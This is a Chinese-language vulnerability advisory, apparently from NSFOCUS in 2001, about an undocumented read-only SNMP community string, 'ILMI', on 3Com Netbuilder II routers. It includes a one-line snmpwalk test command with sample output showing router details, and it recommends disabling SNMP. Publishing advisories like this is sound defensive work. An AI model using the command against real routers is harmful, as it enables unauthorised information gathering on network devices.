3com Netbuilder II 存在未公开的SNMP ILMI 通信字
发布日期:2001-05-29
更新日期:2001-06-01
受影响系统:
3com Netbuilder II
描述:
ILMI (Interim Local Management Interface (ATM concept)) 是个未公开的cisco snmp读写通行字。现在发现3com Netbuilder II路由器同样支持该通行字,不过这次是只读通行字
攻击者可以利用这个漏洞来获取路由器的一些信息。
<* 来源:Juan Manuel Pascual Escriba (
pask@plazasite.com) *>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
$ snmpwalk router ILMI
system.sysDescr.0 = SW/NBII-CP,9.3
system.sysObjectID.0 = OID: enterprises.43.1.4.12
system.sysUpTime.0 = Timeticks: (2777530) 7:42:55.30
system.sysContact.0 =
system.sysName.0 =
system.sysLocation.0 =
system.sysServices.0 = 76
interfaces.ifNumber.0 = 123
interfaces.ifTable.ifEntry.ifIndex.1 = 1
interfaces.ifTable.ifEntry.ifIndex.2 = 2
interfaces.ifTable.ifEntry.ifIndex.3 = 3
interfaces.ifTable.ifEntry.ifIndex.4 = 4
interfaces.ifTable.ifEntry.ifIndex.5 = 5
interfaces.ifTable.ifEntry.ifIndex.6 = 6
interfaces.ifTable.ifEntry.ifIndex.7 = 7
interfaces.ifTable.ifEntry.ifIndex.8 = 8
interfaces.ifTable.ifEntry.ifIndex.9 = 9
interfaces.ifTable.ifEntry.ifIndex.10 = 10
建议:
临时解决方法:
NSFOCUS建议您暂时关闭路由器的SNMP服务
厂商补丁:
目前厂商还没有提供补丁。
我们建议正在使用此产品的用户随时关注厂商站点,升级到最新版本:
http://www.3com.com
浏览次数:3961
严重程度:0(网友投票)
